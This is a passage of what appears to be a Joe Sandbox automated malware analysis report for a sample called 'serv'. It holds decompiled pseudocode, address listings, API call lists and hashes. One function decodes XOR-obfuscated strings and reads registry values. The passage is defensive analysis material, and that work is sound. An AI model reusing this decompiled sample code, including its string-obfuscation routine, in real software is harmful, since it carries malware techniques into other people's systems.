                                                                    				_v72 = 0x2c;
                                                                    				_v71 = 0x2c;
                                                                    				_v70 = 0x3b;
                                                                    				_v69 = 0x30;
                                                                    				_v68 = 0x2a;
                                                                    				_v67 = 8;
                                                                    				_v66 = 0x3b;
                                                                    				_v65 = 0x2c;
                                                                    				_v64 = 0x2d;
                                                                    				_v63 = 0x37;
                                                                    				_v62 = 0x31;
                                                                    				_v61 = 0x30;
                                                                    				_v60 = 2;
                                                                    				_v59 = 0x10;
                                                                    				_v58 = 0x3b;
                                                                    				_v57 = 0x2a;
                                                                    				_v56 = 0x29;
                                                                    				_v55 = 0x31;
                                                                    				_v54 = 0x2c;
                                                                    				_v53 = 0x35;
                                                                    				_v52 = 0x1d;
                                                                    				_v51 = 0x3f;
                                                                    				_v50 = 0x2c;
                                                                    				_v49 = 0x3a;
                                                                    				_v48 = 0x2d;
                                                                    				_v47 = 0x5e;
                                                                    				_t144 = 0;
                                                                    				do {
                                                                    					 *(_t213 + _t144 - 0x64) =  *(_t213 + _t144 - 0x64) ^ 0x0000005e;
                                                                    					_t144 = _t144 + 1;
                                                                    				} while (_t144 < 0x3a);
                                                                    				_t180 = _v8;
                                                                    				if(_t180 >= 0x37) {
                                                                    					_t181 = _t180 * 0x65;
                                                                    				} else {
                                                                    					_t181 = _t180 & 0x0000003e;
                                                                    				}
                                                                    				_t147 = E0041C690(0x80000002,  &_v104, 0, 0x20019,  &_v24);
                                                                    				if(_t181 >= 0x37) {
                                                                    					_t182 = _t181 * 0x65;
                                                                    				} else {
                                                                    					_t182 = _t181 & 0x0000003e;
                                                                    				}
                                                                    				_v8 = _t182;
                                                                    				if(_t147 == 0) {
                                                                    					E0042A7F0(_t182, 0x4485e4,  *0x4485e0 & 0x000000ff);
                                                                    					if(E0041C690(_v24, _a8, 0, 0x20019,  &_v20) == 0) {
                                                                    						_t184 =  *0x4485e4; // 0xdf96
                                                                    						E0042A7CD( &_v8,  *0x4485e0 & 0x000000ff, _t184);
                                                                    						_v12 = 0x104;
                                                                    						E0042A81A(_t189, 0x4485e0, _t184, _v8);
                                                                    						_t205 = _a4 + 0x208;
                                                                    						_t159 = E0041C720(_v20,  &_v44, 0,  &_v16, _a4 + 0x208,  &_v12);
                                                                    						_t185 = _v8;
                                                                    						 *0x4485e4 =  *0x4485e4 + ( *0x4485e4 & 0x0000001b | _t185 * 0x00000036) * 0x4e;
                                                                    						if(_t159 != 0 || _v16 != 1) {
                                                                    							_v32 = 0x17;
                                                                    							_v31 = 0x2c;
                                                                    							_v30 = 0x29;
                                                                    							_v29 = 0x2c;
                                                                    							_v28 = 0x2d;
                                                                    							_v27 = 0x35;
                                                                    							_v26 = 0x2c;
                                                                    							_v25 = 0x42;
                                                                    							_t160 = 0;
                                                                    							do {
                                                                    								 *(_t213 + _t160 - 0x1c) =  *(_t213 + _t160 - 0x1c) ^ 0x00000042;
                                                                    								_t160 = _t160 + 1;
                                                                    							} while (_t160 < 8);
                                                                    							E0041A110(_t205,  &_v32);
                                                                    							_pop(_t195);
                                                                    							E0042A81A(_t195, 0x4485e0, _t185, 0x1e);
                                                                    						}
                                                                    						_v12 = 0x104;
                                                                    						if( *0x4485e4 >= 0x19) {
                                                                    							 *0x4485e4 =  *0x4485e4 ^ 0x00000023;
                                                                    						} else {
                                                                    							 *0x4485e4 =  *0x4485e4 ^ 0x0000001a;
                                                                    						}
                                                                    						_t186 = _t185 * 0x5611;
                                                                    						if(E0041C720(_v20, "Description", 0,  &_v16, _a4,  &_v12) != 0 || _v16 != 1) {
                                                                    							_v32 = 0xe8;
                                                                    							_v31 = 0xd3;
                                                                    							_v30 = 0xd6;
                                                                    							_v29 = 0xd3;
                                                                    							_v28 = 0xd2;
                                                                    							_v27 = 0xca;
                                                                    							_v26 = 0xd3;
                                                                    							_v25 = 0xbd;
                                                                    							_t167 = 0;
                                                                    							do {
                                                                    								 *(_t213 + _t167 - 0x1c) =  *(_t213 + _t167 - 0x1c) ^ 0x000000bd;
                                                                    								_t167 = _t167 + 1;
                                                                    							} while (_t167 < 8);
                                                                    							E0041A110(_t205,  &_v32);
                                                                    							 *0x4485e0 =  *0x4485e0 & 0x0000005f;
                                                                    							_pop(_t195);
                                                                    						}
                                                                    						_v12 = 0x104;
                                                                    						if(_t186 >= 0x37) {
                                                                    							_t187 = _t186 * 0x65;
                                                                    						} else {
                                                                    							_t187 = _t186 & 0x0000003e;
                                                                    						}
                                                                    						_t207 = _a4 + 0x104;
                                                                    						_v8 = _t187;
                                                                    						_v28 = E0041C720(_v20, "Title", 0,  &_v16, _t207,  &_v12);
                                                                    						E0042A81A(_t195, 0x4485e0, 0, 0x22);
                                                                    						if(_v28 != 0 || _v16 != 1) {
                                                                    							_push(_a8);
                                                                    							 *0x4485e4 =  *0x4485e4 + _t187;
                                                                    							wsprintfA(_t207, "[%d] %s", E0041A3C0(), _a4);
                                                                    							_v8 = _t187 ^ 0x0000113e;
                                                                    						}
                                                                    						E0041C870(_v20);
                                                                    						_t182 = _v8;
                                                                    					}
                                                                    					 *0x4485e0 =  *0x4485e0 - _t182;
                                                                    					E0041C870(_v24);
                                                                    					_t147 = 0;
                                                                    				}
                                                                    				return _t147;
                                                                    			}









































































































                                                                    0x0042a851
                                                                    0x0042a857
                                                                    0x0042a85b
                                                                    0x0042a85f
                                                                    0x0042a863
                                                                    0x0042a867
                                                                    0x0042a86b
                                                                    0x0042a86f
                                                                    0x0042a873
                                                                    0x0042a877
                                                                    0x0042a87b
                                                                    0x0042a87f
                                                                    0x0042a883
                                                                    0x0042a887
                                                                    0x0042a889
                                                                    0x0042a889
                                                                    0x0042a88e
                                                                    0x0042a88f
                                                                    0x0042a894
                                                                    0x0042a898
                                                                    0x0042a89c
                                                                    0x0042a8a0
                                                                    0x0042a8a4
                                                                    0x0042a8a8
                                                                    0x0042a8ac
                                                                    0x0042a8b0
                                                                    0x0042a8b4
                                                                    0x0042a8b8
                                                                    0x0042a8bc
                                                                    0x0042a8c0
                                                                    0x0042a8c4
                                                                    0x0042a8c8
                                                                    0x0042a8cc
                                                                    0x0042a8d0
                                                                    0x0042a8d4
                                                                    0x0042a8d8
                                                                    0x0042a8dc
                                                                    0x0042a8e0
                                                                    0x0042a8e4
                                                                    0x0042a8e8
                                                                    0x0042a8ec
                                                                    0x0042a8f0
                                                                    0x0042a8f4
                                                                    0x0042a8f8
                                                                    0x0042a8fc
                                                                    0x0042a900
                                                                    0x0042a904
                                                                    0x0042a908
                                                                    0x0042a90c
                                                                    0x0042a910
                                                                    0x0042a914
                                                                    0x0042a918
                                                                    0x0042a91c
                                                                    0x0042a920
                                                                    0x0042a924
                                                                    0x0042a928
                                                                    0x0042a92c
                                                                    0x0042a930
                                                                    0x0042a934
                                                                    0x0042a938
                                                                    0x0042a93c
                                                                    0x0042a940
                                                                    0x0042a944
                                                                    0x0042a948
                                                                    0x0042a94c
                                                                    0x0042a950
                                                                    0x0042a954
                                                                    0x0042a958
                                                                    0x0042a95c
                                                                    0x0042a960
                                                                    0x0042a964
                                                                    0x0042a968
                                                                    0x0042a96c
                                                                    0x0042a970
                                                                    0x0042a974
                                                                    0x0042a978
                                                                    0x0042a97c
                                                                    0x0042a97e
                                                                    0x0042a97e
                                                                    0x0042a983
                                                                    0x0042a984
                                                                    0x0042a98a
                                                                    0x0042a991
                                                                    0x0042a998
                                                                    0x0042a993
                                                                    0x0042a993
                                                                    0x0042a993
                                                                    0x0042a9b0
                                                                    0x0042a9b8
                                                                    0x0042a9bf
                                                                    0x0042a9ba
                                                                    0x0042a9ba
                                                                    0x0042a9ba
                                                                    0x0042a9c4
                                                                    0x0042a9c7
                                                                    0x0042a9de
                                                                    0x0042a9f7
                                                                    0x0042a9fd
                                                                    0x0042aa12
                                                                    0x0042aa20
                                                                    0x0042aa27
                                                                    0x0042aa33
                                                                    0x0042aa47
                                                                    0x0042aa4c
                                                                    0x0042aa63
                                                                    0x0042aa6c
                                                                    0x0042aa74
                                                                    0x0042aa78
                                                                    0x0042aa7c
                                                                    0x0042aa80
                                                                    0x0042aa84
                                                                    0x0042aa88
                                                                    0x0042aa8c
                                                                    0x0042aa90
                                                                    0x0042aa94
                                                                    0x0042aa96
                                                                    0x0042aa96
                                                                    0x0042aa9b
                                                                    0x0042aa9c
                                                                    0x0042aaa6
                                                                    0x0042aaac
                                                                    0x0042aab0
                                                                    0x0042aab0
                                                                    0x0042aabd
                                                                    0x0042aac4
                                                                    0x0042aad0
                                                                    0x0042aac6
                                                                    0x0042aac6
                                                                    0x0042aac6
                                                                    0x0042aadb
                                                                    0x0042aafa
                                                                    0x0042ab02
                                                                    0x0042ab06
                                                                    0x0042ab0a
                                                                    0x0042ab0e
                                                                    0x0042ab12
                                                                    0x0042ab16
                                                                    0x0042ab1a
                                                                    0x0042ab1e
                                                                    0x0042ab22
                                                                    0x0042ab24
                                                                    0x0042ab24
                                                                    0x0042ab29
                                                                    0x0042ab2a
                                                                    0x0042ab34
                                                                    0x0042ab39
                                                                    0x0042ab41
                                                                    0x0042ab41
                                                                    0x0042ab45
                                                                    0x0042ab4c
                                                                    0x0042ab53
                                                                    0x0042ab4e
                                                                    0x0042ab4e
                                                                    0x0042ab4e
                                                                    0x0042ab5d
                                                                    0x0042ab72
                                                                    0x0042ab7a
                                                                    0x0042ab87
                                                                    0x0042ab90
                                                                    0x0042ab98
                                                                    0x0042ab9b
                                                                    0x0042abb1
                                                                    0x0042abc0
                                                                    0x0042abc0
                                                                    0x0042abc6
                                                                    0x0042abcb
                                                                    0x0042abcb
                                                                    0x0042abd1
                                                                    0x0042abd7
                                                                    0x0042abdc
                                                                    0x0042abde
                                                                    0x0042abe2

                                                                    APIs
                                                                      • Part of subcall function 0041C720: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,00000000,00447B68,?,00000001), ref: 0041C7BA
                                                                    • wsprintfA.USER32 ref: 0042ABB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuewsprintf
                                                                    • String ID: Description$E+.+*2+E$Title$[%d] %s
                                                                    • API String ID: 2072284396-1763686324
                                                                    • Opcode ID: 1561ea308887580a3b3ef63926437cc4acdd368a2d178a09c16f8d6e9f763180
                                                                    • Instruction ID: 1325db8b0e8c24bae71402edd6bc73d1a47bf419e8832e250644012d48c92f37
                                                                    • Opcode Fuzzy Hash: 1561ea308887580a3b3ef63926437cc4acdd368a2d178a09c16f8d6e9f763180
                                                                    • Instruction Fuzzy Hash: C4C184609083C9DDEB12C7F8D8497DEBFB55B12318F48419AD5907A2D2C3B9064AC76A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00427AC2(signed int _a4) {
                                                                    				intOrPtr _v8;
                                                                    				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                    				signed int _t51;
                                                                    				void* _t52;
                                                                    				signed int _t53;
                                                                    				signed int _t55;
                                                                    				signed int _t56;
                                                                    				signed int _t57;
                                                                    				signed int* _t60;
                                                                    				intOrPtr* _t61;
                                                                    				intOrPtr _t63;
                                                                    				signed int _t64;
                                                                    				signed int* _t66;
                                                                    				signed int _t67;
                                                                    				intOrPtr _t68;
                                                                    				void* _t69;
                                                                    				signed int _t70;
                                                                    				void* _t71;
                                                                    				intOrPtr _t73;
                                                                    				void _t74;
                                                                    				signed int _t75;
                                                                    				signed int _t76;
                                                                    				short* _t77;
                                                                    				void* _t79;
                                                                    				signed int _t80;
                                                                    				signed int _t81;
                                                                    				signed int _t82;
                                                                    				signed int _t83;
                                                                    				intOrPtr _t88;
                                                                    				signed int _t91;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    
                                                                    				_t92 = _a4;
                                                                    				_t69 =  *(_t92 + 8);
                                                                    				if((_t69 & 0x00000003) != 0) {
                                                                    					L3:
                                                                    					return 0;
                                                                    				}
                                                                    				_a4 =  *[fs:0x18];
                                                                    				_t51 = _a4;
                                                                    				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                    				_v8 = _t73;
                                                                    				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                    					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                    					__eflags = _t88 - 0xffffffff;
                                                                    					if(_t88 != 0xffffffff) {
                                                                    						_t81 = 0;
                                                                    						__eflags = 0;
                                                                    						_a4 = 0;
                                                                    						_t52 = _t69;
                                                                    						do {
                                                                    							_t74 =  *_t52;
                                                                    							__eflags = _t74 - 0xffffffff;
                                                                    							if(_t74 == 0xffffffff) {
                                                                    								goto L9;
                                                                    							}
                                                                    							__eflags = _t74 - _t81;
                                                                    							if(_t74 >= _t81) {
                                                                    								L41:
                                                                    								_t56 = 0;
                                                                    								L57:
                                                                    								return _t56;
                                                                    							}
                                                                    							L9:
                                                                    							__eflags =  *(_t52 + 4);
                                                                    							if( *(_t52 + 4) != 0) {
                                                                    								_t13 =  &_a4;
                                                                    								 *_t13 = _a4 + 1;
                                                                    								__eflags =  *_t13;
                                                                    							}
                                                                    							_t81 = _t81 + 1;
                                                                    							_t52 = _t52 + 0xc;
                                                                    							__eflags = _t81 - _t88;
                                                                    						} while (_t81 <= _t88);
                                                                    						__eflags = _a4;
                                                                    						if(_a4 == 0) {
                                                                    							L15:
                                                                    							_t53 =  *0x4483d8; // 0x0
                                                                    							_t91 = _t69 & 0xfffff000;
                                                                    							_t93 = 0;
                                                                    							__eflags = _t53;
                                                                    							if(_t53 <= 0) {
                                                                    								L18:
                                                                    								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                    								__eflags = _t55;
                                                                    								if(_t55 == 0) {
                                                                    									L56:
                                                                    									_t56 = _t55 | 0xffffffff;
                                                                    									__eflags = _t56;
                                                                    									goto L57;
                                                                    								}
                                                                    								__eflags = _v36.Type - 0x1000000;
                                                                    								if(_v36.Type != 0x1000000) {
                                                                    									goto L56;
                                                                    								}
                                                                    								__eflags = _v36.Protect & 0x000000cc;
                                                                    								if((_v36.Protect & 0x000000cc) == 0) {
                                                                    									L28:
                                                                    									_t57 = InterlockedExchange(0x448420, 1);
                                                                    									__eflags = _t57;
                                                                    									if(_t57 != 0) {
                                                                    										goto L5;
                                                                    									}
                                                                    									_t75 =  *0x4483d8; // 0x0
                                                                    									__eflags = _t75;
                                                                    									_t82 = _t75;
                                                                    									if(_t75 <= 0) {
                                                                    										L33:
                                                                    										__eflags = _t82;
                                                                    										if(_t82 != 0) {
                                                                    											L40:
                                                                    											InterlockedExchange(0x448420, 0);
                                                                    											goto L5;
                                                                    										}
                                                                    										_t70 = 0xf;
                                                                    										__eflags = _t75 - _t70;
                                                                    										if(_t75 <= _t70) {
                                                                    											_t70 = _t75;
                                                                    										}
                                                                    										_t83 = 0;
                                                                    										__eflags = _t70;
                                                                    										if(_t70 < 0) {
                                                                    											L38:
                                                                    											__eflags = _t75 - 0x10;
                                                                    											if(_t75 < 0x10) {
                                                                    												_t76 = _t75 + 1;
                                                                    												__eflags = _t76;
                                                                    												 *0x4483d8 = _t76;
                                                                    											}
                                                                    											goto L40;
                                                                    										} else {
                                                                    											do {
                                                                    												_t60 = 0x4483e0 + _t83 * 4;
                                                                    												_t83 = _t83 + 1;
                                                                    												__eflags = _t83 - _t70;
                                                                    												 *_t60 = _t91;
                                                                    												_t91 =  *_t60;
                                                                    											} while (_t83 <= _t70);
                                                                    											goto L38;
                                                                    										}
                                                                    									}
                                                                    									_t61 = 0x4483dc + _t75 * 4;
                                                                    									while(1) {
                                                                    										__eflags =  *_t61 - _t91;
                                                                    										if( *_t61 == _t91) {
                                                                    											goto L33;
                                                                    										}
                                                                    										_t82 = _t82 - 1;
                                                                    										_t61 = _t61 - 4;
                                                                    										__eflags = _t82;
                                                                    										if(_t82 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L33;
                                                                    									}
                                                                    									goto L33;
                                                                    								}
                                                                    								_t77 = _v36.AllocationBase;
                                                                    								__eflags =  *_t77 - 0x5a4d;
                                                                    								if( *_t77 != 0x5a4d) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                    								__eflags =  *_t55 - 0x4550;
                                                                    								if( *_t55 != 0x4550) {
                                                                    									goto L56;
                                                                    								}
                                                                    								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                    								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t71 = _t69 - _t77;
                                                                    								__eflags =  *((short*)(_t55 + 6));
                                                                    								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                    								if( *((short*)(_t55 + 6)) <= 0) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                    								__eflags = _t71 - _t63;
                                                                    								if(_t71 < _t63) {
                                                                    									goto L28;
                                                                    								}
                                                                    								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                    								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                    									goto L28;
                                                                    								}
                                                                    								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                    								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                    									goto L41;
                                                                    								}
                                                                    								goto L28;
                                                                    							} else {
                                                                    								goto L16;
                                                                    							}
                                                                    							while(1) {
                                                                    								L16:
                                                                    								__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    								if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    									break;
                                                                    								}
                                                                    								_t93 = _t93 + 1;
                                                                    								__eflags = _t93 - _t53;
                                                                    								if(_t93 < _t53) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L18;
                                                                    							}
                                                                    							__eflags = _t93;
                                                                    							if(_t93 <= 0) {
                                                                    								goto L5;
                                                                    							}
                                                                    							_t64 = InterlockedExchange(0x448420, 1);
                                                                    							__eflags = _t64;
                                                                    							if(_t64 != 0) {
                                                                    								goto L5;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    							if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    								L53:
                                                                    								_t80 = 0;
                                                                    								__eflags = _t93;
                                                                    								if(_t93 < 0) {
                                                                    									L55:
                                                                    									InterlockedExchange(0x448420, 0);
                                                                    									goto L5;
                                                                    								} else {
                                                                    									goto L54;
                                                                    								}
                                                                    								do {
                                                                    									L54:
                                                                    									_t66 = 0x4483e0 + _t80 * 4;
                                                                    									_t80 = _t80 + 1;
                                                                    									__eflags = _t80 - _t93;
                                                                    									 *_t66 = _t91;
                                                                    									_t91 =  *_t66;
                                                                    								} while (_t80 <= _t93);
                                                                    								goto L55;
                                                                    							}
                                                                    							_t67 =  *0x4483d8; // 0x0
                                                                    							_t43 = _t67 - 1; // -1
                                                                    							_t93 = _t43;
                                                                    							__eflags = _t93;
                                                                    							if(_t93 < 0) {
                                                                    								L49:
                                                                    								__eflags = _t67 - 0x10;
                                                                    								if(_t67 < 0x10) {
                                                                    									_t67 = _t67 + 1;
                                                                    									__eflags = _t67;
                                                                    									 *0x4483d8 = _t67;
                                                                    								}
                                                                    								_t46 = _t67 - 1; // 0x0
                                                                    								_t93 = _t46;
                                                                    								goto L53;
                                                                    							} else {
                                                                    								goto L46;
                                                                    							}
                                                                    							while(1) {
                                                                    								L46:
                                                                    								__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    								if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    									break;
                                                                    								}
                                                                    								_t93 = _t93 - 1;
                                                                    								__eflags = _t93;
                                                                    								if(_t93 >= 0) {
                                                                    									continue;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t93;
                                                                    							if(__eflags >= 0) {
                                                                    								if(__eflags == 0) {
                                                                    									goto L55;
                                                                    								}
                                                                    								goto L53;
                                                                    							}
                                                                    							goto L49;
                                                                    						}
                                                                    						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                    						__eflags = _t68 - _v8;
                                                                    						if(_t68 < _v8) {
                                                                    							goto L41;
                                                                    						}
                                                                    						__eflags = _t68 - _t92;
                                                                    						if(_t68 >= _t92) {
                                                                    							goto L41;
                                                                    						}
                                                                    						goto L15;
                                                                    					}
                                                                    					L5:
                                                                    					_t56 = 1;
                                                                    					goto L57;
                                                                    				} else {
                                                                    					goto L3;
                                                                    				}
                                                                    			}



































                                                                    0x00427aca
                                                                    0x00427acd
                                                                    0x00427ad3
                                                                    0x00427af0
                                                                    0x00000000
                                                                    0x00427af0
                                                                    0x00427adb
                                                                    0x00427ade
                                                                    0x00427ae1
                                                                    0x00427ae6
                                                                    0x00427ae9
                                                                    0x00427af8
                                                                    0x00427afb
                                                                    0x00427afe
                                                                    0x00427b08
                                                                    0x00427b08
                                                                    0x00427b0a
                                                                    0x00427b0d
                                                                    0x00427b0f
                                                                    0x00427b0f
                                                                    0x00427b11
                                                                    0x00427b14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b16
                                                                    0x00427b18
                                                                    0x00427c63
                                                                    0x00427c63
                                                                    0x00427ce6
                                                                    0x00000000
                                                                    0x00427ce6
                                                                    0x00427b1e
                                                                    0x00427b1e
                                                                    0x00427b22
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b27
                                                                    0x00427b28
                                                                    0x00427b2b
                                                                    0x00427b2b
                                                                    0x00427b2f
                                                                    0x00427b33
                                                                    0x00427b49
                                                                    0x00427b49
                                                                    0x00427b50
                                                                    0x00427b56
                                                                    0x00427b58
                                                                    0x00427b5a
                                                                    0x00427b6e
                                                                    0x00427b75
                                                                    0x00427b7b
                                                                    0x00427b7d
                                                                    0x00427ce3
                                                                    0x00427ce3
                                                                    0x00427ce3
                                                                    0x00000000
                                                                    0x00427ce3
                                                                    0x00427b83
                                                                    0x00427b8a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b90
                                                                    0x00427b94
                                                                    0x00427bec
                                                                    0x00427bf3
                                                                    0x00427bf9
                                                                    0x00427bfb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c01
                                                                    0x00427c07
                                                                    0x00427c09
                                                                    0x00427c0b
                                                                    0x00427c20
                                                                    0x00427c20
                                                                    0x00427c22
                                                                    0x00427c51
                                                                    0x00427c58
                                                                    0x00000000
                                                                    0x00427c58
                                                                    0x00427c26
                                                                    0x00427c27
                                                                    0x00427c29
                                                                    0x00427c2b
                                                                    0x00427c2b
                                                                    0x00427c2d
                                                                    0x00427c2f
                                                                    0x00427c31
                                                                    0x00427c45
                                                                    0x00427c45
                                                                    0x00427c48
                                                                    0x00427c4a
                                                                    0x00427c4a
                                                                    0x00427c4b
                                                                    0x00427c4b
                                                                    0x00000000
                                                                    0x00427c33
                                                                    0x00427c33
                                                                    0x00427c33
                                                                    0x00427c3c
                                                                    0x00427c3d
                                                                    0x00427c3f
                                                                    0x00427c41
                                                                    0x00427c41
                                                                    0x00000000
                                                                    0x00427c33
                                                                    0x00427c31
                                                                    0x00427c0d
                                                                    0x00427c14
                                                                    0x00427c14
                                                                    0x00427c16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c18
                                                                    0x00427c19
                                                                    0x00427c1c
                                                                    0x00427c1e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c1e
                                                                    0x00000000
                                                                    0x00427c14
                                                                    0x00427b96
                                                                    0x00427b99
                                                                    0x00427b9e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ba7
                                                                    0x00427ba9
                                                                    0x00427baf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bb5
                                                                    0x00427bbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bc1
                                                                    0x00427bc3
                                                                    0x00427bcc
                                                                    0x00427bd0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bd6
                                                                    0x00427bd9
                                                                    0x00427bdb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427be2
                                                                    0x00427be4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427be6
                                                                    0x00427bea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b5c
                                                                    0x00427b5c
                                                                    0x00427b5c
                                                                    0x00427b63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b69
                                                                    0x00427b6a
                                                                    0x00427b6c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b6c
                                                                    0x00427c67
                                                                    0x00427c69
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c7c
                                                                    0x00427c7e
                                                                    0x00427c80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c86
                                                                    0x00427c8d
                                                                    0x00427cbd
                                                                    0x00427cbd
                                                                    0x00427cbf
                                                                    0x00427cc1
                                                                    0x00427cd5
                                                                    0x00427cdc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427cc3
                                                                    0x00427cc3
                                                                    0x00427cc3
                                                                    0x00427ccc
                                                                    0x00427ccd
                                                                    0x00427ccf
                                                                    0x00427cd1
                                                                    0x00427cd1
                                                                    0x00000000
                                                                    0x00427cc3
                                                                    0x00427c8f
                                                                    0x00427c94
                                                                    0x00427c94
                                                                    0x00427c97
                                                                    0x00427c99
                                                                    0x00427cab
                                                                    0x00427cab
                                                                    0x00427cae
                                                                    0x00427cb0
                                                                    0x00427cb0
                                                                    0x00427cb1
                                                                    0x00427cb1
                                                                    0x00427cb6
                                                                    0x00427cb6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c9b
                                                                    0x00427c9b
                                                                    0x00427c9b
                                                                    0x00427ca2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ca4
                                                                    0x00427ca4
                                                                    0x00427ca5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ca5
                                                                    0x00427ca7
                                                                    0x00427ca9
                                                                    0x00427cbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427cbb
                                                                    0x00000000
                                                                    0x00427ca9
                                                                    0x00427b35
                                                                    0x00427b38
                                                                    0x00427b3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b41
                                                                    0x00427b43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b43
                                                                    0x00427b00
                                                                    0x00427b02
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004242B9,?), ref: 00427B75
                                                                    • InterlockedExchange.KERNEL32(00448420,00000001), ref: 00427BF3
                                                                    • InterlockedExchange.KERNEL32(00448420,00000000), ref: 00427C58
                                                                    • InterlockedExchange.KERNEL32(00448420,00000001), ref: 00427C7C
                                                                    • InterlockedExchange.KERNEL32(00448420,00000000), ref: 00427CDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlocked$QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2947987494-0
                                                                    • Opcode ID: 2732343d804e41bff5c24e4326a6e69f578f08226c41092f09d17aa7e924ff49
